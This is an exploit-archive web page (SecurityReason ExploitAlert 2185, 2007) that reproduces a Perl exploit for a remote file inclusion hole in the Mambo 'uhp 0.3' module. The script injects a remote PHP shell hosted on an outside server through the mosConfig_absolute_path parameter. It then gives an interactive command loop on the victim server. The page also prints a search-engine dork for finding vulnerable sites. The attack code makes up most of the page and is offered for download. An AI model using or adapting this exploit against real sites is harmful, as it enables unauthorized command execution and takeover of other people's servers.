SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit


Arrow  ExploitAlert : 2185
Arrow  Credit : Cold z3ro
Arrow  Date : 23.03.2007

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

#!/usr/bin/perl
# _/_ __ _
# long Life / / / My Home Land
# / / / /
# (@_ / / // /
# _ ) ________/ _// /________
# (_)@8@8{}<________Palestine_________>
# )_/ _____/
# (@
#
# MAMBO Ravenswood: User Home Page (Uhp v0.3) (uhp_config.php) Remote File
Inclusion Exploit
# Download Script :
http://mamboxchange.com/frs/download.php/1582/uhp_0.3.zip
# Founded & Coded by: Cold z3ro , Cold-z3ro@hotmail.com
# Dork : index.php?option=com_uhp , inurl:com_uhp
# Exploit :
http://www.example.com/mambo_path/administrator/components/com_uhp/uhp_conf
ig.php?mosConfig_absolute_path=Evil-script?
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()
{
print "[shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$Path.'administrator/components/com_uhp/uhp_config.php?mosConfig_absolute
_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "nCould Not connectn";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[....]/;

if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot execute a blank command in <b>/)
{print "nCould Not Connect to cmd Host or Invalid Command
Variablen";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No
Returnnn"}

if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[....]/[n]/;
print "rn$finreturnnr";
last;
}

else {print "[shell] $";}}}last;

sub head()
{
print "n======================Long Life My Home Land
Palestine======================rn";
print "rn";
print "MAMBO Ravenswood: User Home Page (uhp_config.php) Remote File
Inclusion Exploitrn";
print " Ravenswood: User Home Page = (Uhp v0.3)
rn";
print
"==========================================================================
==rn";
}
sub usage()
{
head();
print "rn";
print " Usage: perl Cold-z3ro.pl <Victim> <Cmd Shell Location> <Cmd Shell
Variable>rnn";
print " <Victim> - Full path to script Example:
http://www.site.com/mambo_path/ rn";
print " <cmd shell> - Path to Cmd Shell e.g http://b0rizq.by.ru/c99.txt?
rn";
print " <cmd variable> - Cmd Variable Used In Php Shell like [ id ]rn";
print "rn";
print
"==========================================================================
==rn";
print "rn";
print " Fund And Coded By Cold z3ro rn";
print " Cold-z3ro[at]hotmail[dot]com rn";
rn";
print " Dork : index.php?option=com_uhp , inurl:com_uhp rn";
print " Thanks for H666p & HacOor
rn";
print " ---------rn";


exit();
}





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.